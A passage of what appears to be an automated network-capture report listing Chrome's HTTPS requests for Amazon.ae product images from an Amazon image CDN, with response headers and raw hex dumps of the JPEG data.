                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ad c3 e1 90 75 b7 cb 2e 9f ed c9 bc 55 35 8d aa 99 01 37 a6 9d 19 01 bd 23 1d 58 e2 aa 79 a2 aa cd ed 9d 6b 39 b8 53 a5 31 fc 11 c4 73 4d 51 ad 06 b2 ac dd 1b 51 90 79 45 4d 06 d5 53 93 70 f8 65 1d 6d f2 5a 7f b7 2e f1 c9 4d 63 6a 38 2f c7 e0 9f a8 73 4a 32 0b 9b dc 9b 79 99 bc 35 23 1d 0e c3 8d 15 01 6f 13 29 f8 8b d8 41 3a d0 bb 65 2e 8f 7e 0b 45 a7 83 3c d0 cd 23 b3 ab a9 12 43 b6 f2 8e dd 8b b7 6e 4d c3 e1 97 47 6e f2 ae a7 6d eb cb bc 72 60 d1 53 e4 84 00 bf 1f 82 b1 65 07 30 21 02 f3 70 18 0d 14 c8 1b e4 e1 d1 82 ba d7 e1 17 75 fb 96 f0 8e a9 57 27 3a b1 35 2b 40 9d 54 a6 72 d1 71 9f 73 bc 93 c1 11 86 3a 49 97 40 e9 99 e5 3d bb 17 6e d5 b8 7c 32 68 ed de f9 65 ae a7 6d eb c9 bc 56 0d 15 3e 48 40 19 04 dd 98 c6 2b 90 67 e1 8c ec c1 36 63 5d 0a 69 3d
                                                                                                                                                                                                        Data Ascii: u.U57#Xyk9S1sMQQyEMSpemZ.Mcj8/sJ2y5#o)A:e.~E<#CnMGnmr`Se0!puW':5+@Trqs:I@=n|2hemV>H@+g6c]i=
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: 95 17 b3 88 90 10 ba 32 b0 cc 3a 95 62 1c 0d 75 e1 2d 6c 33 9a 8d 3e fa 79 d2 91 a7 d2 1b 04 cd 38 b8 9c 4b 9e ad 7d 6a de 61 6c dd a3 e2 86 4d 14 61 99 3e ef ad 5f f2 dd 92 4d a3 d2 d9 91 9a 04 62 16 5e 45 2a d6 bf e6 b9 1d 09 db 6c c5 a4 a9 dd 76 69 24 e8 7f 92 8d 69 86 6c 17 dd 7e 0e ba 6d 6a b0 f7 41 66 93 a9 a0 cc 50 1f d6 35 b2 51 59 7b 5f 56 0b 83 e5 5a 8a f8 22 7b 99 f3 fa ac 1f d8 60 fe c0 78 35 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 5c d5 cd 4a 6b ff 00 9d 6a 16 cb 02 c6 4c 6c 4d 7e e9 5f ba 57 ee 95 fb a5 7e e9 49 00 ab 80 4a d1 aa e1 44 d5 19 1e 7f a8 c9 ce ed c1 bd 25 93 f2 36 1c 56 99 b4 b4 e7 ee 3f 82 20 09 56 c1 75 9a 32 04 bc 1a 4f ef cd 5d cd 6d 63 f2 68 d3 d1 2b d4 76 79 3f
                                                                                                                                                                                                        Data Ascii: 2:bu-l3>y8K}jalMa>_Mb^E*lvi$il~mjAfP5QY{_VZ"{`x5\\\\\\\\\\\\JkjLlM~_W~IJD%6V? Vu2O]mch+vy?
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: 1f 34 fa 5f 82 79 0b e2 e9 05 b7 40 6d 8b 55 60 91 02 d0 d8 5c 05 da f8 35 b9 34 13 82 ee 7a 7e 73 04 e0 34 02 d5 e8 45 a0 ec 3d 75 07 90 5e ac 10 d4 41 c5 67 88 52 9b ac b5 9d 09 18 37 a2 2d 80 7b 8a 38 d0 9d 21 2b 33 a2 38 ae a0 56 17 cc 3e 97 e0 9e 42 f8 ba 47 3a a9 32 0a 33 d0 8c a0 ab ef b7 d9 49 c3 21 9d 13 10 d0 78 50 3f b0 4f 59 41 0e 1e f5 04 46 63 a5 aa b5 6a d9 4b ce 64 b5 ef ed fe 57 90 1f 7f 63 f8 af 81 c6 9c e3 57 79 2d d2 b8 46 af 43 6b c0 5d e9 fe df 99 f4 bf 04 f1 b9 dd 0b 6d 62 a7 66 98 70 e4 b0 4e 05 0e 6c d2 56 82 ea 38 38 03 60 82 62 b7 33 fd 12 ef b4 42 0f 88 0d 36 b1 fe 01 bd bd 44 3f e2 0a 10 3b d6 76 b5 fc bc 0d 5d aa 6b f9 ea 33 13 24 3f ed 2b 68 4d 1a 90 02 f5 a4 34 a9 85 b5 a8 17 cc fa 5f 82 7a b7 d2 fc 13 d5 be 97 e0 9f c2 5b
                                                                                                                                                                                                        Data Ascii: 4_y@mU`\54z~s4E=u^AgR7-{8!+38V>BG:23I!xP?OYAFcjKdWcWy-FCk]mbfpNlV88`b3B6D?;v]k3$?+hM4_z[
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC284INData Raw: a2 cd 0f 32 52 94 a5 6c c2 76 90 aa d5 d5 58 ad aa b5 52 ab 97 ff 00 05 ff 00 ff c4 00 1f 11 00 02 02 01 04 03 00 00 00 00 00 00 00 00 00 00 00 01 31 40 10 02 20 32 60 50 71 81 ff da 00 08 01 02 01 09 3f 00 ed 2e e3 c3 b0 ba 2f be 86 cd 48 d4 87 53 96 de 54 a4 9c 7c 23 12 4d 2e 44 ec 9a 88 48 48 5e 7b ff c4 00 2d 11 00 01 02 04 03 07 02 07 00 00 00 00 00 00 00 00 01 00 02 03 11 21 61 32 41 91 12 22 31 40 51 71 c1 13 42 50 52 62 72 80 a1 a2 ff da 00 08 01 03 01 09 3f 00 fc 27 86 5c 2c 14 17 68 54 17 68 53 0b 7b f2 94 80 3f ab 05 46 86 b5 b2 c8 84 6c 47 43 75 57 9c 21 6f 6d 36 47 5c 95 60 9c 27 c3 b9 20 4c 29 ef 49 4b d3 96 ec 97 46 ae 1e fe 92 ba c7 fa 97 d3 65 f2 a9 7a 59 cf c5 d4 f6 32 9f 19 5f 92 ac 03 c6 d7 6a 33 86 5a d7 13 90 08 53 3b dc ac 5c 5a 7a
                                                                                                                                                                                                        Data Ascii: 2RlvXR1@ 2`Pq?./HST|#M.DHH^{-!a2A"1@QqBPRbr?'\,hThS{?FlGCuW!om6G\`' L)IKFezY2_j3ZS;\Zz


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        30192.168.2.449784151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC690OUTGET /images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712470_372x232_2X_en_AE._SY116_CB560039169_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1870
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: e41ba854-204e-4891-aa83-7d100f928d93
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 08 Apr 2024 11:09:34 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 21:18:21 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1305679
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000113-IAD, cache-ewr-kewr1740076-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 84 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 06 03 05 07 02 01 08 10 00 02 01 03 03 03 02 04 02 09 05 01 00 00 00 00 00 01 02 03 04 11 05 21 31 12 41 51 22 71 13 61 81 a1 06 91 07 14 16 32 42 52 62 72 92 15 33 b1 c1 c2 d1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQ"qa2BRbr3
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC492INData Raw: 6d bb 96 31 96 a4 44 d3 3f dd cf f2 a6 5d 23 2e a4 9f 92 a3 46 d6 56 92 5d 4f 2e 4b 82 d7 6e 9a a7 04 fc 0b 3d 26 17 db 28 00 8e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 01 e5 c9 22 35 d5 cf c1 4b cb 66 8a ae b3 4e 9c dc 6a 2e 1f 66 24 66 e7 a5 9b ad 18 6a 5c 28 1a d8 57 85 78 75 d0 9a 7f 5d bd 9f 74 7d 82 71 f5 37 96 cb c1 3c d3 4d 83 ac 57 f5 3d 6e 36 a9 a8 a6 e5 e1 6c fe af 88 af a3 97 85 c9 87 55 d4 25 46 3d 34 f7 93 e3 ba ca e6 4f e5 1e cb bb f6 2a 90 73 95 3c 54 79 6a 4f 77 cb ee 69 8d 5b ee ac 5a 75 6a 97 30 55 67 b4 a6 e5 c6 7b 3c 25 be fe ef bb 2f 09 60 a6 e9 51 f4 52 5f 37 ff 00 25 c9 93 2f a6 b0 9d 80 03 2e 80 00 00 00 00 00 00 00 00 00 00 00 01 1a ee e5 5a c3 ad c6 52 59 df a2 2e 6d 7c fa 52 72 c1 24 f8 11 4f af ae 69 57 0d 75 dd c1 34 f8 94
                                                                                                                                                                                                        Data Ascii: m1D?]#.FV]O.Kn=&("5KfNj.f$fj\(Wxu]t}q7<MW=n6lU%F=4O*s<TyjOwi[Zuj0Ug{<%/`QR_7%/.ZRY.m|Rr$OiWu4


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        31192.168.2.449787151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC685OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2459
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 4434e34c-e8af-4bd0-99b2-479ec323eef3
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 19 Sep 2043 15:26:23 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:37:59 GMT
                                                                                                                                                                                                        Age: 1402475
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100125-IAD, cache-ewr-kewr1740065-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 09 03 01 02 10 00 01 03 02 03 03 06 0b 06 05 05 01 00 00 00 00 01 00 02 03 04 11 05 12 21 06 13 31 22 32 41 51 91 b1 07 17 33 42 55 61 71 72 73 93 a1 08 34 52 62 81
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"2AQ3BUaqrs4Rb
                                                                                                                                                                                                        2024-08-15 13:37:59 UTC1081INData Raw: ac 4e 2a 04 87 94 07 e9 c9 3f dc 2f 49 e6 99 e6 37 ef 1c 4c 62 cd 24 ea dd 4b ad d6 35 24 aa b7 53 c5 3b 33 c5 7c a4 db 5e 20 aa 5a 56 19 1d bb e9 bd bf c7 61 ef 5b b1 71 63 9b 5d 1d cd 81 24 07 7e 57 9e 6b 87 a9 dc 0a 90 d1 6d 2d 55 25 2b e9 f2 b0 e8 e0 e0 e6 df 52 32 df 88 d4 0e 0a 3d 41 43 26 67 dd 87 77 28 7b 73 5b 4c c0 66 03 da 15 df 13 a6 2d a7 a6 aa b7 96 63 49 f6 f0 3f 50 a8 b2 e1 7c aa da 7b f4 ca de f5 d4 ea 56 06 43 03 5a 00 02 36 58 0d 00 d0 2e 58 e1 1f 7d a6 f8 ac ef 5d 50 83 c9 45 f0 d9 ff 00 c8 41 e8 88 88 08 88 83 54 be d0 fa 62 b8 47 f2 d2 f7 b5 60 56 b1 8e 27 30 59 eb ed 0f a6 2d 83 ff 00 2d 2f 7b 56 bb 4d 21 6b 8a a1 8c e4 7f 2d ad 0d bd b4 1a a8 8c 1f 78 8f de 0a fb 57 21 73 55 86 1f 2e df 7c 28 32 ee 03 56 05 0e 2b 4b e7 4d 0c a1 be
                                                                                                                                                                                                        Data Ascii: N*?/I7Lb$K5$S;3|^ ZVa[qc]$~Wkm-U%+R2=AC&gw({s[Lf-cI?P|{VCZ6X.X}]PEATbG`V'0Y--/{VM!k-xW!sU.|(2V+KM


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        32192.168.2.449791151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC694OUTGET /images/G/39/Associates/XCM_Manual_Coupons_DQC_44b7c125-ee97-441e-9257-50452eb12b8c._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3030
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 581b345a-1d2a-4659-a28b-882d270b8216
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 01 Apr 2044 18:51:15 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 809184
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200174-IAD, cache-ewr-kewr1740021-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9a 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 07 02 08 09 10 00 02 01 03 03 02 02 05 08 08 06 03 00 00 00 00 01 02 00 03 04 11 12 21 31 05 06 13 51 22 32 41 71 a1 07 14 15 23 42 61 81 91 43 52 54 72 92 93 b1 c1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Q"2Aq#BaCRTr
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: a3 da b6 16 f4 c0 a4 95 14 01 fb 55 7f fd 93 67 99 9e 73 08 f8 27 a7 f6 6f 53 b8 a9 6e ef 6a cb 44 d5 42 d5 58 a0 40 a0 86 6d f5 67 89 f5 8f 4f f9 3f b9 be 44 77 b9 a5 46 ad 54 d6 96 ed bd 52 9e 64 02 0a f2 33 b3 63 33 5e f9 42 b1 34 6d ee 3c 02 ca e1 1f 4b 6b 66 6e 09 e4 92 67 59 b0 ea fd 33 b9 13 a7 df dc 51 43 71 6d a1 e9 d4 23 d3 a0 ce b8 3a 1f 9d 2d e5 c3 63 89 5a ad 9d 1b 9a 91 55 fd 92 2d d1 d4 6e 2d 69 49 db f7 4e 4c e4 37 dd 0a f3 a6 5c 78 35 d7 43 ae 08 7c e5 4e 38 65 3e d1 33 06 f2 9a 33 ba d0 40 ce c4 b3 1c d4 cb 1f 25 3b 0c 9e 06 f3 ad f7 3b 5b 54 a2 b4 ab 52 f1 32 2a 7d 6f b2 80 45 d4 5c b7 b3 7c 2a af 2e 4f 90 69 a3 f6 79 a0 95 45 4a d4 4d 57 f1 29 28 20 6a f0 43 f1 50 af 91 7c 29 6f b1 90 78 cc ca ab a2 ca 9d d4 28 53 97 96 5e 64 6a 43 5f
                                                                                                                                                                                                        Data Ascii: Ugs'oSnjDBX@mgO?DwFTRd3c3^B4m<KkfngY3QCqm#:-cZU-n-iINL7\x5C|N8e>33@%;;[TR2*}oE\|*.OiyEJMW)( jCP|)ox(S^djC_
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC274INData Raw: 63 ff 00 51 39 8a a9 62 14 72 66 7e 85 2f 09 02 c6 7c 4f 70 96 c8 af 3e 11 b4 5b 36 64 c7 78 5e 5b 5d 53 b9 4b 6d 5a 0e ea aa 17 5a 9d 99 72 d5 50 0c 8e 0e 0e 27 57 b6 ef 1e 9b 7d 4d 6a 1a c2 91 23 74 a9 e8 3a 9f 23 ec 3e f0 48 9c 68 89 05 41 93 0e 2c ae 9f 9a 29 a3 8c f8 46 dd af 2c 9a 67 6b fa 7e c0 f1 75 4b f9 82 3e 9e b1 fd a6 9f f1 89 c4 cd 35 f2 91 e1 2f 94 eb e2 f9 fe 33 97 83 61 f9 19 db 0f 71 74 f4 04 b5 d5 3f e2 cc e7 dd df dd df 4b 04 b5 b3 07 c1 46 05 9c 8d 3e 21 1c 00 39 d2 39 c9 e4 cd 58 22 8f 64 9c 4a f7 1c 4b 56 bd 37 4d 24 93 dc b1 6f c3 14 68 54 55 1b 6d ad 8b 74 2c 65 c0 cc 98 99 79 35 30 22 22 41 22 22 20 02 22 20 06 aa 22 22 5f 2d 08 88 8a 07 a8 88 8a c0 09 31 11 19 06 72 d2 8a a2 2b 01 bb 63 79 77 11 38 bd ca f2 7e 66 22 22 29 02 22
                                                                                                                                                                                                        Data Ascii: cQ9brf~/|Op>[6dx^[]SKmZZrP'W}Mj#t:#>HhA,)F,gk~uK>5/3aqt?KF>!99X"dJKV7M$ohTUmt,ey50""A"" " ""_-1r+cyw8~f"")"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        33192.168.2.449792151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC683OUTGET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4119
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 155987bd-dff7-4711-b3c5-179394104e7d
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 11:45:15 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 17 Apr 2044 04:47:15 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 861113
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:00 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200022-IAD, cache-ewr-kewr1740066-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a2 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 01 04 05 02 03 08 10 00 02 01 03 02 03 05 04 06 07 08 03 00 00 00 00 01 02 03 00 04 11 12 21 05 31 41 06 13 22 51 61 07 32 71 81 14 16 91 92 a1 b2 23 42 52 93 b1 d1 d2 15 17
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qa2q#BR
